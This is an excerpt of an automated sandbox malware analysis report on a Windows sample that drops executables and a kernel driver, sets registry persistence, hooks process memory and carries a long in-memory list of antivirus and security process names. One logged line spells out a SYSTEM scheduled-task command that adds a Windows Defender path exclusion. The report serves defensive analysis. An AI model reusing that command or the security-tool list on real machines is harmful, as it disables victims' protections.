              Source: C:\Users\user\Documents\sgH8Ps.exeFile written: C:\Users\Public\Music\destopbak.iniJump to behavior
              Source: 45631.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: 45631.exeStatic file information: File size 31614976 > 1048576
              Source: 45631.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: d:\depot\ca\EasyDMS\7.10_REL_ntamd64\src\optu\ntamd64\EasyDmsStart.pdb source: 45631.exe
              Source: Binary string: d:\depot\ca\EasyDMS\7.10_REL_ntamd64\src\optu\ntamd64\EasyDmsStart.pdb source: 45631.exe
              Source: Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: Twhtlb.exe, 00000028.00000002.3979563135.0000000000F68000.00000002.00000001.01000000.0000000A.sdmp, Twhtlb.exe, 00000028.00000000.3611622084.0000000000F68000.00000002.00000001.01000000.0000000A.sdmp, Twhtlb.exe, 00000028.00000002.3979769502.000000000115E000.00000004.00000020.00020000.00000000.sdmp, Twhtlb.exe, 00000029.00000002.3648686550.0000000000F68000.00000002.00000001.01000000.0000000A.sdmp, Twhtlb.exe, 00000029.00000000.3638122049.0000000000F68000.00000002.00000001.01000000.0000000A.sdmp, 6WWeC.exe, 0000002A.00000000.3641345339.0000000000528000.00000002.00000001.01000000.0000000C.sdmp, 6WWeC.exe, 0000002A.00000002.3651204621.0000000000528000.00000002.00000001.01000000.0000000C.sdmp, Twhtlb.exe, 0000002D.00000000.3651208728.0000000000F68000.00000002.00000001.01000000.0000000A.sdmp, Twhtlb.exe, 0000002D.00000002.3663827299.0000000000F68000.00000002.00000001.01000000.0000000A.sdmp, Twhtlb.exe, 0000002E.00000002.3756389310.0000000000F68000.00000002.00000001.01000000.0000000A.sdmp, Twhtlb.exe, 0000002E.00000000.3747948848.0000000000F68000.00000002.00000001.01000000.0000000A.sdmp, 6WWeC.exe, 0000002F.00000002.3764008827.0000000000528000.00000002.00000001.01000000.0000000C.sdmp, 6WWeC.exe, 0000002F.00000000.3751219420.0000000000528000.00000002.00000001.01000000.0000000C.sdmp, 6WWeC.exe.40.dr
              Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
              Source: Binary string: y:\avsdk5\user\make\build\public\64-bit\vseamps.pdb source: sgH8Ps.exe, 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmp, sgH8Ps.exe, 00000006.00000000.2757387672.0000000140014000.00000002.00000001.01000000.00000008.sdmp, sgH8Ps.exe, 00000007.00000000.3147439412.0000000140014000.00000002.00000001.01000000.00000008.sdmp, sgH8Ps.exe.0.dr

              Data Obfuscation

              barindex
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeUnpacked PE file: 40.2.Twhtlb.exe.5300000.7.unpack
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 6_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_000000014000F000
              Source: initial sampleStatic PE information: section where entry point is pointing to: .mo:
              Source: tbcore3U.dll.7.drStatic PE information: section name: .%?.
              Source: tbcore3U.dll.7.drStatic PE information: section name: .%-[
              Source: tbcore3U.dll.7.drStatic PE information: section name: .mo:
              Source: tbcore3U.dll.40.drStatic PE information: section name: .%?.
              Source: tbcore3U.dll.40.drStatic PE information: section name: .%-[
              Source: tbcore3U.dll.40.drStatic PE information: section name: .mo:
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeCode function: 42_2_00522691 push ecx; ret 42_2_005226A4

              Persistence and Installation Behavior

              barindex
              Source: C:\Users\user\Desktop\45631.exeFile created: C:\Users\user\Documents\sgH8Ps.exeJump to dropped file
              Source: C:\Users\user\Desktop\45631.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
              Source: C:\Users\user\Desktop\45631.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
              Source: C:\Users\user\Desktop\45631.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
              Source: C:\Users\user\Desktop\45631.exeFile created: C:\Users\user\Documents\sgH8Ps.exeJump to dropped file
              Source: C:\Users\user\Documents\sgH8Ps.exeFile created: C:\Program Files (x86)\Twhtlb\Twhtlb.exeJump to dropped file
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeFile created: C:\Program Files (x86)\K5YQV85\6WWeC.exeJump to dropped file
              Source: C:\Users\user\Desktop\45631.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
              Source: C:\Users\user\Documents\sgH8Ps.exeFile created: C:\Program Files (x86)\Twhtlb\tbcore3U.dllJump to dropped file
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeFile created: C:\Program Files (x86)\K5YQV85\tbcore3U.dllJump to dropped file
              Source: C:\Users\user\Desktop\45631.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file

              Boot Survival

              barindex
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeKey value created or modified: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron GroupfenzhuJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeKey value created or modified: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron GroupfenzhuJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeRegistry key created: HKEY_CURRENT_USER\System\CurrentControlSet\Services\SauronJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 6_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,6_2_0000000140001520

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Users\user\Documents\sgH8Ps.exeMemory written: PID: 4920 base: 7FFDB4590008 value: E9 EB D9 E9 FF Jump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeMemory written: PID: 4920 base: 7FFDB442D9F0 value: E9 20 26 16 00 Jump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeMemory written: PID: 6196 base: 7FFDB4590008 value: E9 EB D9 E9 FF Jump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeMemory written: PID: 6196 base: 7FFDB442D9F0 value: E9 20 26 16 00 Jump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeMemory written: PID: 3744 base: 1140005 value: E9 8B 2F 24 76 Jump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeMemory written: PID: 3744 base: 77382F90 value: E9 7A D0 DB 89 Jump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeMemory written: PID: 3744 base: 1560005 value: E9 8B 2F E2 75 Jump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeMemory written: PID: 3744 base: 77382F90 value: E9 7A D0 1D 8A Jump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeMemory written: PID: 1224 base: 1200005 value: E9 8B 2F 18 76
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeMemory written: PID: 1224 base: 77382F90 value: E9 7A D0 E7 89
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeMemory written: PID: 1124 base: 920005 value: E9 8B 2F A6 76
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeMemory written: PID: 1124 base: 77382F90 value: E9 7A D0 59 89
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeMemory written: PID: 5692 base: E20005 value: E9 8B 2F 56 76
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeMemory written: PID: 5692 base: 77382F90 value: E9 7A D0 A9 89
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeMemory written: PID: 4908 base: E10005 value: E9 8B 2F 57 76
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeMemory written: PID: 4908 base: 77382F90 value: E9 7A D0 A8 89
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeMemory written: PID: 2456 base: 8E0005 value: E9 8B 2F AA 76
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeMemory written: PID: 2456 base: 77382F90 value: E9 7A D0 55 89
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeAPI/Special instruction interceptor: Address: 6CA9B056
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeAPI/Special instruction interceptor: Address: 6C9D87AA
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeAPI/Special instruction interceptor: Address: 6CA8A702
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeAPI/Special instruction interceptor: Address: 6CAC82C1
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeAPI/Special instruction interceptor: Address: 6C9AFFCB
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeAPI/Special instruction interceptor: Address: 6CAB6E74
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeAPI/Special instruction interceptor: Address: 6CA48647
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeAPI/Special instruction interceptor: Address: 6C8FDE34
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeAPI/Special instruction interceptor: Address: 41C1A77
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeAPI/Special instruction interceptor: Address: 3D1A400
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeAPI/Special instruction interceptor: Address: 3D9119D
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeAPI/Special instruction interceptor: Address: 3DD8F6F
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeAPI/Special instruction interceptor: Address: 3E8E5B4
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeAPI/Special instruction interceptor: Address: 3E77E1B
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeAPI/Special instruction interceptor: Address: 3E81246
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeAPI/Special instruction interceptor: Address: 6C9A5143
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeAPI/Special instruction interceptor: Address: 6C9A3E38
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeAPI/Special instruction interceptor: Address: 6C369F9E
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeAPI/Special instruction interceptor: Address: 6C2E183C
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeAPI/Special instruction interceptor: Address: 6C265143
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeAPI/Special instruction interceptor: Address: 6C34A702
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeAPI/Special instruction interceptor: Address: 6CA1F839
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeAPI/Special instruction interceptor: Address: 6C9E080B
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeAPI/Special instruction interceptor: Address: 6C9E2089
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeAPI/Special instruction interceptor: Address: 6C2A080B
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeAPI/Special instruction interceptor: Address: 6C2EC0AF
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeAPI/Special instruction interceptor: Address: 6C2A2089
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeAPI/Special instruction interceptor: Address: 6C9890FC
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeAPI/Special instruction interceptor: Address: 6C9CF34F
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeAPI/Special instruction interceptor: Address: 6CAD6565
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeAPI/Special instruction interceptor: Address: 6CA75F8C
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeAPI/Special instruction interceptor: Address: 6CAA9F9E
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeAPI/Special instruction interceptor: Address: 6C94BC04
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeAPI/Special instruction interceptor: Address: 6C25F34F
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeAPI/Special instruction interceptor: Address: 6C233E38
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeAPI/Special instruction interceptor: Address: 6C1DBC04
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeAPI/Special instruction interceptor: Address: 6C31A702
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeAPI/Special instruction interceptor: Address: 6C988B19
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeAPI/Special instruction interceptor: Address: 6C9D87B1
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeAPI/Special instruction interceptor: Address: 6C2687B1
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeAPI/Special instruction interceptor: Address: 6C377912
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeAPI/Special instruction interceptor: Address: 6C3791B6
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeAPI/Special instruction interceptor: Address: 6C362F48
              Source: Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: {4E062DDA-444A-A2A8-84CE-E105F66A5AB3}SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEMCONSENTPROMPTBEHAVIORADMINSOFTWARE\PERFRPOOLSOFTWARE\PPFR49/56/235/24;9161POSTDATAC:\WINDOWS\SYSWOW64\DRIVERS\189ATOHCI.SYS360SAFE.EXE360SD.EXE360RP.EXE360RPS.EXESRAGENT.EXE360TRAY.EXEZHUDONGFANGYU.EXEKANKAN.EXESUPERKILLER.EXELIVEUPDATE360.EXEMODULEUPDATE.EXEFILESMASHER.EXEAGREEMENTVIEWER.EXESOFTMGRLITE.EXE360LEAKFIXER.EXE360SDRUN.EXE360SDUPD.EXE360FILEGUARD.EXEDEP360.EXEDUMPUPER.EXEDSMAIN.EXEDSMAIN64.EXEFIRSTAIDBOX.EXECHECKSM.EXEHIPSMAIN.EXEHIPSDAEMON.EXEHIPSTRAY.EXEHRUPDATE.EXEHIPSLOG.EXENETFLOW.EXEAUTORUNS.EXEUSYSDIAG.EXEWSCTRLSVC.EXEWSCTRL.EXEKXEMAIN.EXEKXESCORE.EXEKSCAN.EXEKXECENTER.EXEKXETRAY.EXEKDINFOMGR.EXEKISLIVE.EXEKNEWVIP.EXEKSOFTPURIFIER.EXEKTRASHAUTOCLEAN.EXEKAUTHORITYVIEW.EXETQCLIENT.EXETQEDRNAME.EXETQSAFEUI.EXETQTRAY.EXETRANTORAGENT.EXETQDEFENDER.EXETQUPDATEUI.EXETQWATERMARK.EXEDLPAPPDATA.EXENACLDIS.EXEMSMPENG.EXEMPCMDRUN.EXELDSHELPER.EXELDSSECURITY.EXELDSSECURITYAIDER.EXECOMPUTERZTRAY.EXECOMPUTERCENTER.EXEGUARDHP.EXECOMPUTERZ_CN.EXECOMPUTERZSERVICE.EXECOMPUTERZSERVICE_X64.EXEHDW_DISK_SCAN.EXECOMPUTERZMONHELPER.EXEDRVMGR.EXEWEB_HOST.EXE2345SAFECENTERSVC.EXE2345RTPROTECT.EXE2345SAFESVC.EXE2345MPCSAFE.EXE2345SAFETRAY.EXE2345SAFEUPDATE.EXE2345VIRUSSCAN.EXE2345MANUUPDATE.EXE2345ADRTPROTECT.EXE2345AUTHORITYPROTECT.EXE2345EXTSHELL.EXE2345EXTSHELL64.EXE2345FILESHRE.EXE2345LEAKFIXER.EXE2345LSPFIX.EXE2345PCSAFEBOOTASSISTANT.EXE2345RTPROTECTCENTER.EXE2345SHELLPRO.EXE2345SYSDOCTOR.EXELENOVOPCMANAGERSERVICE.EXELENOVOPCMANAGER.EXELAVSERVICE.EXELENOVOTRAY.EXELNVSVCFDN.EXEWSCTRL7.EXEWSCTRL10.EXEWSCTRL11.EXELENOVOAPPUPDATE.EXELENOVOAPPSTORE.EXEDESKTOPASSISTANTAPP.EXEDESKTOPASSISTANT.EXELENOVOMONITORMANAGER.EXELENOVOOKM.EXELEASHIVE.EXESTARTUPMANAGER.EXEWSPLUGINHOST.EXEWSPLUGINHOST64.EXECRASHPAD_HANDLER.EXESEARCHuser.EXELISFSERVICE.EXELSF.EXEAPPVANT.EXELENOVOINTERNETSOFTWAREFRAMEWORK.EXEEMDRIVERASSIST.EXELEAPPOM.EXEHOTFIXPLATFORM.EXEMSPCMANAGER.EXEMSPCMANAGERSERVICE.EXEAVP.EXEAVPUI.EXEAVASTSVC.EXEASWTOOLSSVC.EXEASWIDSAGENT.EXEWSC_PROXY.EXEAVASTUI.EXEAVIRA.SPOTLIGHT.SERVICE.EXEENDPOINTPROTECTION.EXESENTRYEYE.EXEAVIRA.SPOTLIGHT.COMMON.UPDATER.EXEAVIRA.SPOTLIGHT.FALLBACKUPDATER.EXEAVIRA.SPOTLIGHT.UI.APPLICATION.EXEAVIRA.SPOTLIGHT.SYSTRAY.APPLICATION.EXEAVIRA.OPTIMIZERHOST.EXEAVIRA.SPOTLIGHT.BOOTSTRAPPER.EXEAVIRA.SPOTLIGHT.SERVICE.WORKER.EXEAVIRA.SPOTLIGHT.COMMON.UPDATERTRACKER.EXEAVIRA.SPOTLIGHT.UI.APPLICATION.MESSAGING.EXEAVIRA.SPOTLIGHT.UI.ADMINISTRATIVERIGHTSPROVIDER.EXEMFEMMS.EXEMFEVTPS.EXEMCAPEXE.EXEMCSHIELD.EXEMCUICNT.EXEMFEAVSVC.EXENISSRV.EXESECURITYHEALTHSYSTRAY.EXEKWSPROTECT64.EXEQMDL.EXEQMPERSONALCENTER.EXEQQPCPATCH.EXEQQPCREALTIMESPEEDUP.EXEQQPCRTP.EXEQQPCTRAY.EXEQQREPAIR.EXEQQPCMGRUPDATE.EXEKSAFETRAY.EXEMPCOPYACCELERATOR.EXEUNTHREAT.EXEK7TSECURITY.EXEAD-WATCH.EXEPSAFESYSTRAY.EXEVSSERV.EXEREMUPD.EXERTVSCAN.EXEASHDISP.EXEAVCENTER.EXETMBMSRV.EXEKNSDTRAY.EXEV3SVC.EXEMSSECESS.EXEQUHLPSVC.EXERAVMOND.EXEKVMONXP.EXEBAIDUSAFETRAY.EXEBAIDUSD.EXEBKA.EXEBKA
              Source: Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: AUTORUNS.EXE
